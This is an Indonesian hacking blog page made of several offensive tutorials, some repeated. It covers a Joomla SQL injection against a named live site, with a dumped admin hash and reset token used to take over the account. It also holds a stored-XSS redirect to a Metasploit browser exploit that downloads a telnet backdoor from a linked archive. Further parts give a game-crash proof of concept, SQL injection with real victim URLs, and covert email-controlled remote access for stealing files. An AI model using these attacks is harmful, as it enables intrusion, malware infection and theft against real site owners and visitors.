Assalamualaikum saya kali ini mau share tentang exploit joomla com_artforms karna saya suka dengan exploit ini jangan takut karna exploit ini masih bisa di gunakan sampai sekarang
ok tanpa basa basi aja ya
Dork : inurl:”option com_artforms” bisa juga menggunakan dengan mirc
Ok sekarang kita dapat target contoh target di sini saya mendapat kan ini http://www.avaclean.com/
target : http://www.avaclean.com/
dan sekarang kita buka web target tadi
Contoh : http://www.avaclean.com/ dan sekarang coba pasang exploit no 2 tadi dengan contoh seperti ini :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(email,0x3a,username,0x3a,password)+from+jos_users–
dan hasil nya akan seperti ini
josh@bkmediagroup.comadminjosh@bkmediagroup.com:josh@bkmediagroup.com4fffa8274459e218833756e3149ab20d:jWtEsQNqFQPZchh86wvmnO3XIlTOwZ9P
dan sekarang kita coba open tab untuk mereset password nya
contoh :
http://www.avaclean.com//index.php?option=com_user&view=reset
dan sekarang masukan email tersebut
josh@bkmediagroup.com
ok nanti dia akan meminta token uppzzz jangan senang dulu sekarang kita coba cari token dengan memakai exploit no 4
contoh :
http://www.avaclean.com//index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,version(),5,concat_ws(username,0x3a,activation)+from+jos_users–
dan hasil nya akan menjadi seperti ini
admineda7d6142fac40a533b56407a4617371
ok sekarang kita kembali ke reset password tadi kan tadi minta token sekarang kita liat code yang barusan tadi
ok kita dapat seperti ini : admineda7d6142fac40a533b56407a4617371 <== yang mana code token nya ?? ok sekarang saya jelas kan
code : [admin]eda7d6142fac40a533b56407a4617371
yang saya kasih dalam tanda kurung itu adalah user nya
nah sekarang coba kita ambil code ini : eda7d6142fac40a533b56407a4617371
dan itu adalah token nya
selamat sekarang anda menjadi admin
untuk joomla login ada biasa nya
contoh login admin : http://localhost/administrator
dan sekarang coba kita masukan dengan user yang tadi kalian dapat dan password baru yang kalian buat tadi
# Update
untuk code token sekarang kalau untuk manual kebanyakan biasa nya memakai tanda $$$ contoh token yang tidak bisa di reset seperti ini
:admin39e2d1bd5f899df5c15ac35abb9bc977:$1$c8b6c03c$
dan bila kalian menemukan bagian seperti ada tanda $1$c8b6c03c$ tidak bisa di reset password
Ok sekian dulu toturial dari saya salam selalu .
Mohon maaf bila ada salah yang saya berikan ini
Thanks to : p4km1n -=- SikodoQ -=- Unix -=- Billgates -=- Raka MBT -=- Om-Jin -=- All member KCH | MBT | Anonymousteam Defacer Indonesia |
Memanfaatkan celah XSS Persistent pada suatu web untuk menyebarkan backdoor telnet ke para pengunjung web
Pertama-tama anda dapat membuat sebuah file dengan nama web.php
web.ph<!DOCTYPE HTML PUBLIC “-//W3C//DTD HTML 4.0 Transitional//EN”>
<html>
<head>
<title>Error page</title>
</HEAD>
<BODY>
<?php
$ipaddress = $_SERVER['REMOTE_ADDR'];
$referrer = getenv(‘HTTP_REFERER’);
$simpandate = date(“d-m-y / H:i:s”);
$userAgent = getenv(‘HTTP_USER_AGENT’);
$invoegen = $simpandate . ”
<br/><b>IP :</b> ” . $ipaddress . ”
<br/> <b>From :</b> <a href=’” . $referrer . “‘>” . $referrer . “</a>
<br/><b>Browser :</b> ” . $userAgent .”
<br />========================================<br/>”;
$fopen = fopen(“daftar_ip.html”, “a”);
fwrite($fopen, $invoegen);
fclose($fopen);
?>
<script type=’text/javascript’>
window.location.href=”http://(ip komputer anda)/”;
</script>
</BODY>
</HTML>
Lalu buat file kosong dengan nama daftar_ip.html.
Kita siapkan Metasploit Framework, disini ada berbagai exploitasi browser dan aplikasi-aplikasi yang dapat berintegrasi dengan browser misal Adobe Acrobat.
Disini penulis contohkan untuk IE 7.
MMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMM MMMMMMMMMM
MMMN$ vMMMM
MMMNl MMMMM MMMMM JMMMM
MMMNl MMMMMMMN NMMMMMMM JMMMM
MMMNl MMMMMMMMMNmmmNMMMMMMMMM JMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMMMMMMMMMMMMMMMMMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMMM MMMMMMM MMMMM jMMMM
MMMNI MMMNM MMMMMMM MMMMM jMMMM
MMMNI WMMMM MMMMMMM MMMM# JMMMM
MMMMR ?MMNM MMMMM .dMMMM
MMMMNm `?MMM MMMM` dMMMMM
MMMMMMN ?MM MM? NMMMMMN
MMMMMMMMNe JMMMMMNMMM
MMMMMMMMMMNm, eMMMMMNMMNMM
MMMMNNMNMMMMMNx MMMMMMNMMNMMNM
MMMMMMMMNMMNMMMMm+..+MMNMMNMNMMNMMNMM
=[ metasploit v4.0.0-release [core:4.0 api:1.0]
+ — –=[ 718 exploits – 361 auxiliary – 68 post
+ — –=[ 226 payloads – 27 encoders – 8 nops
=[ svn r13462 updated 229 days ago (2011.08.01)
Warning: This copy of the Metasploit Framework was last updated 229 days ago.
We recommend that you update the framework at least every other day.
For information on updating your copy of Metasploit, please see:
https://community.rapid7.com/docs/DOC-1306
msf > use exploit/windows/browser/ms09_002_memory_corruption
msf exploit(ms09_002_memory_corruption) > set PAYLOAD windows/download_exec
PAYLOAD => windows/download_exec
msf exploit(ms09_002_memory_corruption) > set SRVPORT 80
msf exploit(ms09_002_memory_corruption) > set URL http://(domain anda tempat meletakkan file telnet)/telnet2.exe
SRVPORT => 80
URL => http://(domain anda tempat meletakkan file telnet)/telnet2.exe
msf exploit(ms09_002_memory_corruption) > set URIPATH /
URIPATH => /
msf exploit(ms09_002_memory_corruption) > exploit
Setelah memasukkan perintah-perintah diatas maka komputer anda sudah siap untuk menerima kunjungan dari browser korban.
Karena kita menggunakan backdoor telnet maka target juga harus memiliki IP Publik dan berhubungan langsung dengan komputernya misalnya dia menggunakan Indos*t M2, atau Telk*m Fl*sh. Jika target anda tidak mempunyai IP Publik yang berhubungan langsung dengan komputernya maka anda dapat menggunakan backdoor lain yang sifatnya komputer korban memanggil komputer penyerang yang konsepnya sama dengan Connect Back.
Skenario
Pada target yang memilih celah XSS Persistent dapat dimasukkan <script>document.location=’http://(web anda)/web.php’;</script>
Ketika sudah disimpan oleh web dan korban membuka web tersebut maka korban dari website yang dia buka akan menjalankan web.php dan terekam ip komputer korban, dari situ browser akan diarahkan untuk membuka exploit di komputer attacker. Saat exploit bekerja dengan baik maka korban akan mendownload otomatis file telnet2.exe dan dijalankan.
Saat komputer korban menjalankan file telnet2.exe maka kita dapat melihat daftar IP ( daftar_ip.html ) yang terekam tadi tinggal kita masuk ke komputer korban dengan perintah telnet (ip korban) 5000. Mengapa port 5000? karena file telnet2.exe membuka pada port 5000.
Download : http://xcode.or.id/telnetbackdoor.rar
*Program ini terdeteksi sebagai malware oleh AV
Password : yogyafree
Oleh Kurniawan – yk_family_code@yahoo.com
XSS Persistent untuk deface halaman web
Berjumpa lagi dengan saya Mas Kurniawan. Sebelumnya penulis telah membahas tentang XSS, untuk review k ebelakang penulis akan membahasnya kembali bahwa XSS adalah salah satu serangan injeksi code (kode html) yang dimana sebelumnya di blog ini yang dibahas adalah yang sifatnya reflected atau non persistent yang disitu kode HTML tidak tersimpan di web server.
Teknik XSS (Cross Site Scripting) untuk mendapatkan shell target si pembuka URL
http://blog.xcode.or.id/?p=634
Juga di http://blog.xcode.or.id/?p=883 dibahas dari scanning XSS dan exploitasinya.
Disini penulis akan membahas tentang XSS stored atau Persistent yang dapat berpengaruh pada semua klien yang masuk ke halaman web tersebut karena inputan HTML kita akan disimpan didalam web server.
Contohnya target kita adalah CMS Max Guestbook, CMS ini tidak ada databasenya, hasil rekaman disimpan di web server.
Disini penulis mencoba melakukan inputan pada “Name”, disini inputannya adalah :
Seperti dibawah ini :

Hasilnya adalah

Ketika pengunjung lain masuk ke buku tamu tersebut maka pesan alert “Kurniawan memang ganteng” tetap muncul karena inputan HTML yang penulis lakukan tersimpan dalam web server.
Sekarang kita coba dengan
<script>document.location=’http://xcode.or.id/sample.html’;</script>

Maka hasilnya buku tamu akan melakukan redirect ke http://xcode.or.id/sample.html
Dengan demikian maka kesimpulannya adalah XSS stored atau Persistent mempunyai efek serangan yang lebih besar dibandingkan dengan XSS sifatnya reflected atau non persistent.
Oleh Kurniawan – yk_family_code@yahoo.com
Teknik XSS (Cross Site Scripting) untuk mendapatkan shell target si pembuka URL
http://blog.xcode.or.id/?p=634
Juga di http://blog.xcode.or.id/?p=883 dibahas dari scanning XSS dan exploitasinya.
Disini penulis akan membahas tentang XSS stored atau Persistent yang dapat berpengaruh pada semua klien yang masuk ke halaman web tersebut karena inputan HTML kita akan disimpan didalam web server.
Contohnya target kita adalah CMS Max Guestbook, CMS ini tidak ada databasenya, hasil rekaman disimpan di web server.
Disini penulis mencoba melakukan inputan pada “Name”, disini inputannya adalah :
<script>alert('Kurniawan memang ganteng')</script>Seperti dibawah ini :
Hasilnya adalah
Ketika pengunjung lain masuk ke buku tamu tersebut maka pesan alert “Kurniawan memang ganteng” tetap muncul karena inputan HTML yang penulis lakukan tersimpan dalam web server.
Sekarang kita coba dengan
<script>document.location=’http://xcode.or.id/sample.html’;</script>
Maka hasilnya buku tamu akan melakukan redirect ke http://xcode.or.id/sample.html
Dengan demikian maka kesimpulannya adalah XSS stored atau Persistent mempunyai efek serangan yang lebih besar dibandingkan dengan XSS sifatnya reflected atau non persistent.
Oleh Kurniawan – yk_family_code@yahoo.com
Counter-Strike 1.6 No Steam Crash Exploit
=========================================
Counter-Strike 1.6 No Steam Crash Exploit
=========================================
:————————————————————————————————————————————————————:
: # Exploit Title : Counter-Strike 1.6 No Steam Crash Exploit
: # Date : March 4th 2012
: # Author : X-Cisadane
: # Software Link : http://blog.counter-strike.net/
: # Version : 1.6
: # Category : Desktop (Windows) Applications
: # Platform : Win32
: # Vulnerability : Crash Exploit
: # Tested On : Windows XP Professional Service Pack 3
: # Greetz to : X-Code, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:————————————————————————————————————————————————————:
Proof Of Concept
================
[ENGLISH]
1.This my default Counter-Strike No Steam installation directory : C:\Program Files\Counter-Strike 1.6\
2.Open default Counter-Strike No Steam installation directory and open the directory named cstrike (C:\Program Files\Counter-Strike 1.6\cstrike\)
3.Find & Open motd.txt and replace the contents with this code :
HTML BODY IFRAME src=”file://þ:/filename” /BODY /HTML
4.Save!
5.Run Counter-Strike 1.6 No Steam
- Create a new game, Choose the map & set the gameplay.
- Start your game! Waiting until map loaded & the motd show
- And Counter-Strike 1.6 No Steam Forcibly Closed (Crash).
[INDONESIAN]
1.Ini direktori saya tempat menginstall Counter-Strike No Steam : C:\Program Files\Counter-Strike 1.6\
2.Buka direktori tempat menginstall Counter-Strike No Steam dan buka direktori bernama cstrike (C:\Program Files\Counter-Strike 1.6\cstrike\)
3.Temukan dan buka file motd.txt dan ganti isi file tersebut dengan koding di bawah ini :
” iframe src=”file://þ:/filename” width=”320″ height=”240″ /iframe ”
4.Simpan!
5.Jalankan Counter-Strike 1.6 No Steam
- Buat sebuah Server, Pilih map dan atur permainan.
- Mulailah permainan! Tunggu hingga progress bar selesai dan map berhasil dimuat serta motdnya muncul.
- Dan secara paksa Counter-Strike 1.6 No Steam akan tertutup.
NB : Exploit ini bisa dikembangkan, monggo bagi yang dah master silahkan dicoba-coba
CnnCMS 1.x SQL Injection Vulnerability
:————————————————————————————————————————-:
: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability
: # Date : March 3rd 2012
: # Author : Darkzzzz a.k.a X-Cisadane
: # Software Link : http://www.thinknolimits.com/
: # Version : 1.x
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:sub_menu.php?sid=
: # Greetz to : XCode-Yogyafree, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:————————————————————————————————————————-:
SQL Injection Vulnerability :
- Open Victim Website : http:////sub_menu.php?sid=-[SQL]
Example :
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1
Admin Page (Default) : http:////admin/
: # Exploit Title : CnnCMS 1.x SQL Injection Vulnerability
: # Date : March 3rd 2012
: # Author : Darkzzzz a.k.a X-Cisadane
: # Software Link : http://www.thinknolimits.com/
: # Version : 1.x
: # Category : Web Applications
: # Vulnerability : SQL Injection
: # Tested On : Google Chrome 14.0.835 (Windows)
: # Dorks : inurl:sub_menu.php?sid=
: # Greetz to : XCode-Yogyafree, Muslim Hackers, Depok Cyber, Hacker Cisadane, Borneo Crew, Dunia Santai, Jiban Crew, CodeNesia, Axon Code, Jember Hacker, Winda Utari
:————————————————————————————————————————-:
SQL Injection Vulnerability :
- Open Victim Website : http:////sub_menu.php?sid=-[SQL]
Example :
http://garden-goldenteakfurniture.com/sub_menu.php?sid=-13
http://lunar.co.id/sub_menu.php?sid=-1
http://www.djawaleather.com/sub_menu.php?sid=-1
http://www.gravigra.com/sub_menu.php?sid=-1
http://www.harpagreen.com/sub_menu.php?sid=-2
http://www.suwastama.co.id/sub_menu.php?sid=-1
Admin Page (Default) : http:////admin/
Tutorial penggunaan Remote By Mail
Penulis : j0ck3r » Sun Feb 26, 2012
Remote By Mail buatan http://www.runtime.org/ Meskipun namanya Remote tapi software ini bukanlah Trojan,saya lebih suka menyebutnya sebagai software remote access,akan tetapi tehnik yang digunakan cukup unik yaitu menggunakan media e-mail.,suatu tehnik yang unik dan bisa melewati proteksi yang dilakukan oleh Firewall.Tetapi ( ada tapinya lhoo…) kita tidak bisa melakukan instalasi jarak jauh seperti trojan yang bisa di binded dengan software lain.Kita haru duduk didepan komputer korban dan melakukan installasi manual dan setting manual.Yuk kita mulai belajar menggunakan software ini
Pertama-tama,setelah download filenya kita lakukan installasi dulu,jadi gak perlu saya jelaskan disini,tentunya semuanya bisa melakukan installasi. Downloadnya disini
setelah selesai lalu kita jalankan softwarenya dan pilih tools lalu pilih account,disini kita isi dengan alamat e-mail dimana software ini secara berkala akan melakukan check di inbox e-mail yang udah kita tentukan.urutanya kaya gini:
Account name: Diisi bebas
From Name: Di isi Bebas
From E-mail: Di isi alamat e-mail tempat perintah dikirimkan
POP Server : Alamat POP e-mail tempat perintah,disini saya pake e-mail dari drivehq jadi alamat POP nya adalah mail.drivehq.com
POP User : Di isi username POP
POP Password: Di isi Password login POP
SMTP: : Di isi alamat SMTP E-mail
Authentication : Pilih aja same as POP
Delete Message: Menentukan tiap berapa hari e-mail di software ini dihapus
Kolom Access: Menentukan dari domain e-mail mana perintah yang akan dilakukan. Misal kita pakai gmail maka di isi *@gmail.com
Available Commands: Default perintah yang ada,kita bisa ,menambahkan daftar perintah disana
Password: Menentukan Pasword,karena sekarang memalsukan e-mail kan mudah,maka diperlukan password agar software ini melakukan verifikasi perintah dari “tuannya”
Default Reply Subject: Diisi bebas
kalau udah klik OK. kaya gambar dibawah
Nb: Bila ada yang belum tahu alamat POP dan SMTP e-mail yang digunakan,bisa ditanyakan ke penyedia layanan e-mail yang digunakan.

Lalu setelah selesai klik lagi Tools dan pilih Options dan kita tentukan tiap berapa menit software ini mengecek e-mail di inbox yang sudah di setting tadi

Kalau udah kita klik start dan komputer yang terinstall sudah siap dikendalikan dengan e-mail.Sekarang kita buka e-mail lalu kirimkan perintah ke e-mail yang sudah kita set tadi di softwarenya.Tadi saya menggunakan email dari drivehq yaitu j0ck3rmaniax@drivehq.com sedangkan e-mail untuk memberi perintah adalah jockermaniax@gmail.com,jadi saya buka gmail dan mulai menjalankan perintah darisana.Untuk mode penulisan perintahanya sebagai berikut:
Dibagian penerima pesan saya masukkan email dari drivehq tadi,lalu dibagian subject saya isi passsword yang sudah saya tentukan,misal kita mengisi kolom password tadi dengan123456 maka di bagian subject di isi 123456,dan dibagian Body/Isi surat kita masukkan perintah yang kita kehendaki.Misal saya ingin liat isi drive C: korban,maka dibagian Body saya tulis DIR C: lalu kita kirim

Remote By Mail akan mengecek inbox di e-mail j0ck3rmaniax@drivehq.com,bila ada perintah baru dia akan segera merespon dan membalas perintah tersebut ke e-mail saya tadi yaitu jockermaniax@gmail.com


Thuu..keliatan isi Drive C: nya.Bila kita ingin mengambil file yang ada di komputer korban,maka kita ketikkan perintah SEND ( drive\directory\namafile),misal saya akan mengambil file yang bernama creditcard.txt yang terletak di drive C:\data\ maka saya ketikkan SEND C:\data\creditcard.txt di bagian body e-mail.
Sekian tulisan dari saya,bila ada salah kata mohon maaf sebesar besarnya yaaa…
courtesy.xcode
Remote By Mail buatan http://www.runtime.org/ Meskipun namanya Remote tapi software ini bukanlah Trojan,saya lebih suka menyebutnya sebagai software remote access,akan tetapi tehnik yang digunakan cukup unik yaitu menggunakan media e-mail.,suatu tehnik yang unik dan bisa melewati proteksi yang dilakukan oleh Firewall.Tetapi ( ada tapinya lhoo…) kita tidak bisa melakukan instalasi jarak jauh seperti trojan yang bisa di binded dengan software lain.Kita haru duduk didepan komputer korban dan melakukan installasi manual dan setting manual.Yuk kita mulai belajar menggunakan software ini
Pertama-tama,setelah download filenya kita lakukan installasi dulu,jadi gak perlu saya jelaskan disini,tentunya semuanya bisa melakukan installasi. Downloadnya disini
setelah selesai lalu kita jalankan softwarenya dan pilih tools lalu pilih account,disini kita isi dengan alamat e-mail dimana software ini secara berkala akan melakukan check di inbox e-mail yang udah kita tentukan.urutanya kaya gini:
Account name: Diisi bebas
From Name: Di isi Bebas
From E-mail: Di isi alamat e-mail tempat perintah dikirimkan
POP Server : Alamat POP e-mail tempat perintah,disini saya pake e-mail dari drivehq jadi alamat POP nya adalah mail.drivehq.com
POP User : Di isi username POP
POP Password: Di isi Password login POP
SMTP: : Di isi alamat SMTP E-mail
Authentication : Pilih aja same as POP
Delete Message: Menentukan tiap berapa hari e-mail di software ini dihapus
Kolom Access: Menentukan dari domain e-mail mana perintah yang akan dilakukan. Misal kita pakai gmail maka di isi *@gmail.com
Available Commands: Default perintah yang ada,kita bisa ,menambahkan daftar perintah disana
Password: Menentukan Pasword,karena sekarang memalsukan e-mail kan mudah,maka diperlukan password agar software ini melakukan verifikasi perintah dari “tuannya”
Default Reply Subject: Diisi bebas
kalau udah klik OK. kaya gambar dibawah
Nb: Bila ada yang belum tahu alamat POP dan SMTP e-mail yang digunakan,bisa ditanyakan ke penyedia layanan e-mail yang digunakan.

Lalu setelah selesai klik lagi Tools dan pilih Options dan kita tentukan tiap berapa menit software ini mengecek e-mail di inbox yang sudah di setting tadi

Kalau udah kita klik start dan komputer yang terinstall sudah siap dikendalikan dengan e-mail.Sekarang kita buka e-mail lalu kirimkan perintah ke e-mail yang sudah kita set tadi di softwarenya.Tadi saya menggunakan email dari drivehq yaitu j0ck3rmaniax@drivehq.com sedangkan e-mail untuk memberi perintah adalah jockermaniax@gmail.com,jadi saya buka gmail dan mulai menjalankan perintah darisana.Untuk mode penulisan perintahanya sebagai berikut:
Dibagian penerima pesan saya masukkan email dari drivehq tadi,lalu dibagian subject saya isi passsword yang sudah saya tentukan,misal kita mengisi kolom password tadi dengan123456 maka di bagian subject di isi 123456,dan dibagian Body/Isi surat kita masukkan perintah yang kita kehendaki.Misal saya ingin liat isi drive C: korban,maka dibagian Body saya tulis DIR C: lalu kita kirim

Remote By Mail akan mengecek inbox di e-mail j0ck3rmaniax@drivehq.com,bila ada perintah baru dia akan segera merespon dan membalas perintah tersebut ke e-mail saya tadi yaitu jockermaniax@gmail.com


Thuu..keliatan isi Drive C: nya.Bila kita ingin mengambil file yang ada di komputer korban,maka kita ketikkan perintah SEND ( drive\directory\namafile),misal saya akan mengambil file yang bernama creditcard.txt yang terletak di drive C:\data\ maka saya ketikkan SEND C:\data\creditcard.txt di bagian body e-mail.
Sekian tulisan dari saya,bila ada salah kata mohon maaf sebesar besarnya yaaa…
courtesy.xcode
0 komentar:
Posting Komentar